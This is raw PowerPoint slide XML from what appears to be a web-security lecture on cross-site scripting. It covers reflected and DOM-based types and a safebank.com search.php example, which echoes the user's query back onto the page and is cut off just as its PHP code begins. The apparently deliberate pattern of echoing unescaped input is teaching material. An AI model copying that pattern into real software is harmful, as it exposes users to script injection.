            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>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b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘reflected’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>0:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Based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C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>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4" name="object 4"/>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6" name="object 6"/>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8" name="object 8"/>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8361" y="333396"/>
            <a:ext cx="7595447" cy="920830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Continued:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Blog</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278991" y="1963974"/>
            <a:ext cx="7053580" cy="1638996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="102447" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="473275" marR="66885" indent="-457189">
              <a:lnSpc>
                <a:spcPts val="2813"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="807"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>transaction</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> search </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-640" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>interface</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-458035">
              <a:lnSpc>
                <a:spcPts val="2813"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="713"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>search.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-700" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cce</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>results,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>helpful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>top.</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232291" y="3808984"/>
            <a:ext cx="365760" cy="332783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2480"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598051" y="3808984"/>
            <a:ext cx="7640320" cy="332783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEFCF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="180335">
              <a:lnSpc>
                <a:spcPts val="2480"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
